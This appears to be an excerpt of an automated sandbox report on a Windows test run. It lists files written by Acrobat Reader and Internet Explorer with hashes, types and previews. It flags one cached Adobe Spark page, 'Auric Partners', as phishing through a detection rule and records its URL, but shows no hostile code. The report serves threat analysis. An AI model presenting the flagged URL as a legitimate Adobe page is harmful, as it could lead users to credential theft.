                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):69366
                                                                                                                                                                                                                                                        Entropy (8bit):1.0112122137822999
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:35w5q5ZUY54ePnK5b6pLPUHjHzLgzk3gLbpoALbmo6nAPSl:348zrvq6w
                                                                                                                                                                                                                                                        MD5:4565A9F519E1FC5EC62C689AC8F5C1C9
                                                                                                                                                                                                                                                        SHA1:7F50DA6A2B1CDEBFA26470B5BC118A4E9A1F47A6
                                                                                                                                                                                                                                                        SHA-256:F2430B5E3D5E24C0BBE6270233AF0CB8382977C34444813410A6CE81795CFE2C
                                                                                                                                                                                                                                                        SHA-512:83F938995B253AB58F98C0E5CBF0B98B587E4E1DCD1B29CE56416BFC097D0D45ECC1DF2417C5C28785FED2CA09387DA7E7EDD3E18015158BB0C1DB5AB71A4471
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: BM........6...(...r...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3024000
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                        Entropy (8bit):3.386711081908555
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:iR49IVXEBodRBkQaOhFVCsL49IVXEBodRBkREaOhAVCs749IVXEBodRBklEaOhQ6:iGedRBOedRBdedRB7edRBm
                                                                                                                                                                                                                                                        MD5:8E0AB7D815B1AFAD297558F04AD6BEB7
                                                                                                                                                                                                                                                        SHA1:46885C4EDC08DF18FE59EAA061CE732CCFF75C77
                                                                                                                                                                                                                                                        SHA-256:2F4BE45D570ABF4190E8D1A9A879164B078772F4DC74923B4455D7B6A75753D9
                                                                                                                                                                                                                                                        SHA-512:8BCF169D9360A18BF374182409955AD92D0010B1EBA372C42649DFEAD2B5D9F1B7A89EE13104BB7CC734EAB773D5C958D7DF689DB251648DDC4D47AAA11546B7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):34928
                                                                                                                                                                                                                                                        Entropy (8bit):3.199765215919205
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:e7OhFVCP4949IVXEBodRBkJcaOhFVCsUfLR49IVXEBodRBk1EaOhAVCsyd49IVXy:e8iedRBsfLGedRB3CedRBfyedRBc
                                                                                                                                                                                                                                                        MD5:478CD4C00FE99F426AAF674DFC40D9B8
                                                                                                                                                                                                                                                        SHA1:BED188F03FC50BB3CDDEEFF245CD547AE3A3DF9F
                                                                                                                                                                                                                                                        SHA-256:F93644A57F010AC867FB65FFD90591EB25AE6922308E89796AAFBA1C9A1BAFCA
                                                                                                                                                                                                                                                        SHA-512:BAC2065A6856CB1A0193292B22785E185C694A40056612CD5E415C04041EF4627F418EED790C154FB11E13EBB1E76A17F6D2ED193377AAA4845FBA9D87E7D950
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X...h...y................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\6T0VAUN5\www.adobe[1].xml
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1201
                                                                                                                                                                                                                                                        Entropy (8bit):4.841167538951289
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:W0U1mKm6DOnPU1mKm6DOny6unPU1mKm6DOny6unAXnPU1mKm6DOny6unPU1mKm6m:0sKO8sKO48sKO4A8sKO48sKO48sKO41
                                                                                                                                                                                                                                                        MD5:1E2A3B9A6A2A4310B284856E2ACEB18A
                                                                                                                                                                                                                                                        SHA1:C8C1F1BAE4F1E32447694480DC716909E9F8A1C6
                                                                                                                                                                                                                                                        SHA-256:BB2910C86C48F6D78510C3EBC3278424F03BC61C1F1D0C519859E3ABEB1316D9
                                                                                                                                                                                                                                                        SHA-512:FB527C18F4E933A1BF0D345F60CBF900E9E09009DBE953CB04A65742DD8E24E0ACE9ABECD20C5C1EA35B82C687EAE125D5957DBB194F1F368876D07DDA3F770B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <root></root><root></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="4021717408" htime="30891752" /></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="4021717408" htime="30891752" /><item name="mar_aud" value="Bot" ltime="4024097408" htime="30891752" /></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="4021717408" htime="30891752" /><item name="mar_aud" value="Bot" ltime="4024097408" htime="30891752" /><item name="isStoragePolyfillNeeded" value="true" ltime="4025617408" htime="30891752" /></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="4021717408" htime="30891752" /><item name="mar_aud" value="Bot" ltime="4024097408" htime="30891752" /></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="4021717408" htime="30891752" /><item name="mar_aud" value="Bot" ltime="4024097408" htime="30891752" /
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QUN6RYTY\spark.adobe[1].xml
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):135
                                                                                                                                                                                                                                                        Entropy (8bit):4.745229021359919
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:D90aK1ryRtFwsnObemKmlULF0VqHlJR37ccy/NsqSeUSQGLKb:JFK1rUFjgemKm6GVqHlJR3Yv/ueLQpb
                                                                                                                                                                                                                                                        MD5:7ECB26FB33F1B14500E9D9CDCFB13DDD
                                                                                                                                                                                                                                                        SHA1:CEC8897E78C7B09F9EF33E60B2335C96D302921C
                                                                                                                                                                                                                                                        SHA-256:9C583A24ED234A94AB76E39EAB2F6559DDCC3AE249C475FBBCE0D5E4ACDCD280
                                                                                                                                                                                                                                                        SHA-512:BD50604C3F501A45FF2A7EC3E013DA220D53CDBC7EDD671609B474F68809C184F8A1261054EE9D17C6ECB8DE22C8E6292D258E534049F0475F704A2BB632B99E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <root></root><root><item name="com.adobe.reactor.dataElementCookiesMigrated" value="true" ltime="3999627408" htime="30891752" /></root>
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{135EBDC3-CADC-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Word Document
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):32856
                                                                                                                                                                                                                                                        Entropy (8bit):1.8512068900747847
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:IwvGcprGGwpLxG/ap8FGIpcpYGvnZpvpmGvHZp9p5GoTqpvp2Go4XpcXGWvrvuGZ:rlZeZ12HWDtxfytvXW9UZtjy3
                                                                                                                                                                                                                                                        MD5:EB2D2B22625666B8E26F7FBCCDF16B94
                                                                                                                                                                                                                                                        SHA1:B4EEFFB0837C46BAB27003911360D8DD460C17B2
                                                                                                                                                                                                                                                        SHA-256:926DD3E0D490ABB2AE66F1340839D723694866CEF3DF18D801D5FAD857AC1764
                                                                                                                                                                                                                                                        SHA-512:7D7BE11A1409EA0CB636F81769D05E53A9304B2C74EA1085EB88571245579E77E5BE0954A37BA5E160055BDB7CD17F003D2D5E0D94027D9072C9D11EF4198DB3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{135EBDC5-CADC-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Word Document
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):179124
                                                                                                                                                                                                                                                        Entropy (8bit):2.544860081756992
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:5NUFSGXj+izGCtUY53uMXl704uQAWsqq/Rin:GlX06
                                                                                                                                                                                                                                                        MD5:380FF961B9F3C146284263EE515670E0
                                                                                                                                                                                                                                                        SHA1:59C3CB030B958C26C900BE4A9A7FF2E0879EC1AB
                                                                                                                                                                                                                                                        SHA-256:C65DDCC35D66518253DF56B51487557606EF8A1F7A1F156C2E38B3B2D1395BB4
                                                                                                                                                                                                                                                        SHA-512:244FC3BD2CD1507221A3862C338B5A05F0521E9A07327109AB8BCC0A07A607435054AA9371B22071CA41D8FA764C530BC5FFC58757A51B667AEB0979D27D514A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1A6D0B25-CADC-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Word Document
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16984
                                                                                                                                                                                                                                                        Entropy (8bit):1.566170173685886
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Iw9GcproGwpaVG4pQdGrapbSTtGQpKhxG7HpRicTGIpG:rjZwQH69BSTXAhgTzA
                                                                                                                                                                                                                                                        MD5:4B229DB768417EC48238852B4112D225
                                                                                                                                                                                                                                                        SHA1:B4324BD52E8F48D0D42BAC13098DB3D0BFB0A2E7
                                                                                                                                                                                                                                                        SHA-256:3EB54C3E904DA1136885987DE5C2D5A7C2EF99982626187FEF3F985F5B1CF8C0
                                                                                                                                                                                                                                                        SHA-512:5D423A109F66C7A2DD53E5B52EBBEB1C48CFD46D209ACCAAB5223985141809C2B893317F02CC1A8EC28E826D2EADAD159A860A7289C15B0D73411E29F6982AFF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):28454
                                                                                                                                                                                                                                                        Entropy (8bit):2.0664698546460576
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:R6fVgizzxxEKzOQBbcpS5WT//zVJrc7gzdbklTMl1sy6TMenl7ulGt/3GmjAA2XI:Mdx70sI2NmU3G8cj70sI2NmU3Gz
                                                                                                                                                                                                                                                        MD5:1F2BBE148080EDB61592819A2732E291
                                                                                                                                                                                                                                                        SHA1:AF6D839E8AA1BD1283B70E05216A92E9C7A06E64
                                                                                                                                                                                                                                                        SHA-256:B5C55B0E2C030849298D748810D49A9F2A8C75FDF7BF7C888FE0F6B629F7FDE4
                                                                                                                                                                                                                                                        SHA-512:B2E79DA1305637469747C8588ED07C5A2CBC8AD7DD5140E229A8619CAB0BBBF97C248C279844E1A406A688CC7CF867A2347ED0383A6250C971D56C37893A5B60
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: B.h.t.t.p.s.:././.p.a.g.e...a.d.o.b.e.s.p.a.r.k.-.a.s.s.e.t.s...c.o.m./.r.u.n.t.i.m.e./.1...2.2./.i.m.a.g.e.s./.f.a.v.i.c.o.n...i.c.o........... .... .........(... ...@..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................70..7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...70..............................7`..7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7`......................70..7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...70..................7...7...7...7...7...7.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Adobe_favicon[1].ico
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 1 icon, 48x48, 32 bits/pixel
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9662
                                                                                                                                                                                                                                                        Entropy (8bit):1.5933577223587498
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:97gzdbklTMl1sy6TMenl7ulGt/3GmjAAp:970sI2NmU3GY
                                                                                                                                                                                                                                                        MD5:B28BF60DD7E50B6DFFD394EBC0F9057A
                                                                                                                                                                                                                                                        SHA1:9EA7EED87B689757780322989EF426AEFFDC8F7A
                                                                                                                                                                                                                                                        SHA-256:BF24C9E4D37F94D4BD2F870228FF421CA54B2949DB3391DBD3818EC0E6DB0F5F
                                                                                                                                                                                                                                                        SHA-512:B16A7F756E38FFE4BBCC0394A6E41593CC9FE68AACA6350C1C20D10E7A284EBFC7937C15726D0F43A3ABD7C43D128A041A109CAC2C8F240707FE1997E633E025
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc/Adobe_favicon.ico
                                                                                                                                                                                                                                                        Preview: ......00.... ..%......(...0...`..... ......$.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................A...........................................................................................................V...............................'...............................................A..........................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Contact_72px_lt-gray[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):28341
                                                                                                                                                                                                                                                        Entropy (8bit):6.120769466888277
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:37iSZiRcO9jD+7ZBNq+2owtRXhhMEnWLbljThoIJ5q:cRzGZBk+2owPleZX5q
                                                                                                                                                                                                                                                        MD5:901C088DD283B59F4A43F74D798EDC60
                                                                                                                                                                                                                                                        SHA1:959EA9066F892F103A3DDA229D67619150F7DD7B
                                                                                                                                                                                                                                                        SHA-256:C45E2555412C2D5EC5E521ED5851B3D3665F90DD1DC645D6D59DEEFD71BC2ECB
                                                                                                                                                                                                                                                        SHA-512:DAE5CFA3F362280B2D903FC35C6290AB28CCF5E5E5EA6C081B2EFFDBC20AA34301085DFAB35A0EFF5B6ECC7ED6C049668D95274DDF8A06314D60FD612A004555
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc1/en/privacy/images/Contact_72px_lt-gray.svg
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [..<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">..<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">..<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">..<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">..<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">..<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">..<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">..<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">.]>.<svg version="1.1" id="adobeNews_x5F_72_x5F_lt-ou" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;".. xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="72px" height="72px".. viewBox="-359 271 72 72" style="enab
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\GG8mUEsjQvSUh[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):52203
                                                                                                                                                                                                                                                        Entropy (8bit):5.20614071782965
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:8n8+27e5FyW7F1FnWO8JARtEeqakKnMrb:8nT224W7zhWO8JCnMf
                                                                                                                                                                                                                                                        MD5:02DF9DD00895D7E0017A343FCD94B7A7
                                                                                                                                                                                                                                                        SHA1:982E84D3E85CCDEAB0C881FB9B5CDCEF3D676B95
                                                                                                                                                                                                                                                        SHA-256:B49AD6B8BA2A9617DD8F02411CE66B6579D95DDA2F8D625B946EE679EAB3DCE0
                                                                                                                                                                                                                                                        SHA-512:AE52F0F90DDC9262A3DA0553E63256A66657C363FE3AD760809AEFA80BE3A278169A3BF936E9870029525ED62627EA920CFB5A1C3EA9AB3264C5F259BE1BBC96
                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_HtmlPhish_29, Description: Yara detected HtmlPhish_29, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\GG8mUEsjQvSUh[1].htm, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_HtmlPhish_29, Description: Yara detected HtmlPhish_29, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\GG8mUEsjQvSUh[1].htm, Author: Joe Security
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/page/GG8mUEsjQvSUh/?page-mode=static
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html>.<html>.<head>. <meta charset="utf-8">. <title>Auric Partners</title>. <meta content="yes" name="apple-touch-fullscreen" />. <meta content="yes" name="apple-mobile-web-app-capable" />. <meta content="black-translucent" name="apple-mobile-web-app-status-bar-style" />. <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport" />.. <meta name="robots" content="noindex">.. <meta property="og:title" content="Auric Partners">. <meta property="og:type" content="website">. <meta property="og:image" content="https://spark.adobe.com/page/GG8mUEsjQvSUh/embed.jpg?buster=1623333594506">. <meta property="og:image:width" content="1024">. <meta property="og:image:height" content="512">. <meta property="og:site_name" content="Adobe Spark">. <meta property="og:description" content="A story told with Adobe Spark">.. <meta name="twitter:card" content="summary_large_image">. <meta name="twitter:title" content="Auric P
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Privacy-Header-2-1440x340.jpg.img[1].jpg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[TIFF image data, little-endian, direntries=0], baseline, precision 8, 1440x430, frames 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):87554
                                                                                                                                                                                                                                                        Entropy (8bit):7.97194369897045
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:jTiiUlWRB717xEVxvzDwgBFxks8cVzjNeyjFLdAZBc2:jT6AB/41is8cNRbjtdI1
                                                                                                                                                                                                                                                        MD5:36815147C5BD0A82CF08ADF18C4CE9DB
                                                                                                                                                                                                                                                        SHA1:F5FE3F3312117D43AF628780AD94F7409F51BC51
                                                                                                                                                                                                                                                        SHA-256:FA058BE1A59315346088172661F221BB988B929F4FE9CA7C2C98F49970D0109D
                                                                                                                                                                                                                                                        SHA-512:2DD8E040B9046322F4259ABC673BB1CD980E440FE0D1EE5BFD6FD6FFC14D36F810BB0222E1413ECF65A49C335F894923C365F0E7E6C0BB6DC69A4A3DBF05E406
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc1/en/privacy/images/Privacy-Header-2-1440x340.jpg.img.jpg
                                                                                                                                                                                                                                                        Preview: ......Exif..II*.................Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8005f268-2f6e-41f7-b266-aa21258a942f" xmpMM:DocumentID="xmp.did:1DF2B77A0FFC11E6838996FD381AB7D0" xmpMM:InstanceID="xmp.iid:1DF2B7790FFC11E6838996FD381AB7D0" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3a3c0c1d-b343-4643-ac1e-d229304d8b58" stRef:documentID="adobe:docid:photoshop:c44cf741-5865-1179-9b5f-a5ee13961278"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\PrivacyChoices_72px_lt-gray[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):28419
                                                                                                                                                                                                                                                        Entropy (8bit):6.117998475478093
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:37S2WvPzXeJfwU2ihjrx8Ks+a/4TLpCknorFPBHCJ93BvxHtc6:0HzONH2ihRLM/4H8korVBiH3jZ
                                                                                                                                                                                                                                                        MD5:775D2556523FF33568DCF0EE25C3249B
                                                                                                                                                                                                                                                        SHA1:8575AF9EDFEB7E1A2D1B7A36DA34F13594CFD7F1
                                                                                                                                                                                                                                                        SHA-256:241B307DFAB1F3CA3C626DF06C32F5472777A4316013981A121B951911B311FE
                                                                                                                                                                                                                                                        SHA-512:5ED60101D06A32FDA1D8A979FFC701641577DD694987ABAE741B7B154AFDAAFBDE1A294EDB66AC14B1B8C3D82BB184B5BEE9E1F92000FF8669F8D99626645E34
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc1/en/privacy/images/PrivacyChoices_72px_lt-gray.svg
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [..<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">..<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">..<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">..<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">..<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">..<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">..<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">..<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">.]>.<svg version="1.1" id="adobeNews_x5F_72_x5F_lt-ou" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;".. xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="72px" height="72px".. viewBox="-359 271 72 72" style="enab
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\RC5e5d1b9fe0a942c38190dc2199529941-file.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:C source, ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1568
                                                                                                                                                                                                                                                        Entropy (8bit):5.27597051838108
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:15+sregiQhdsitymtCZv4j+YuteKhXSXNjTjOofbOK5b/q:1ksrPld3tymtCpLYuteMXSXNjTjhT5q
                                                                                                                                                                                                                                                        MD5:8F7C77F0608AE9AB17E6E07745FD24A9
                                                                                                                                                                                                                                                        SHA1:850FF8C69723B05D83558C9832C294607C0E1C3F
                                                                                                                                                                                                                                                        SHA-256:E49AE1EE55CC0DB995DCB4F734C59AEC3669F9532926B03EA8912435FB777573
                                                                                                                                                                                                                                                        SHA-512:4E957A29AB4916027446EF5635CA2ADB57DAA0B337F0C9A4BD04425976952DE8AC567706CA86933D6CB6775E13D3DC699ADA8AD41DA2D682B7C7371F8E43C0B9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC5e5d1b9fe0a942c38190dc2199529941-file.min.js
                                                                                                                                                                                                                                                        Preview: // For license information, see `https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC5e5d1b9fe0a942c38190dc2199529941-file.js`..!function(){var e,t,n,o,u=window,s="adobePrivacy:Privacy",a="OptanonChoice",i=new Date,r={domain:_satellite._getDomain(),path:"/",samesite:"Lax",expires:(i.setFullYear(i.getFullYear()+1),i)};t=function(){o||(o=!0,n=function(){var e,t,n,o,s,a,i,r={},d=u.OneTrust.GetDomainData().Groups;for(o=0,s=d.length;o<s;o++)if((e=d[o])&&(t=e.Hosts))for(a=0,i=t.length;a<i;a++)(n=t[a])&&(r[n.HostName]={groupId:e.CustomGroupId,hostId:n.HostId,displayName:n.displayName});_satellite.oneTrustList=r,_satellite.oneTrustIsHostEnabled=function(e){var t,n=window.OnetrustActiveGroups;return!(!(t=r[e])||-1===n.indexOf(","+t.hostId+","))},_satellite.groupEnabled=function(e){var t=window.OnetrustActiveGroups;return!(!t||-1===t.indexOf(e))},_satellite.track("initTrackConsent")},_satellite._poll(n,[function(){return u.OneTrust}],{timeout:1e4,interval:100}))},e=function(e){u
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\adobe-logo-gray[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
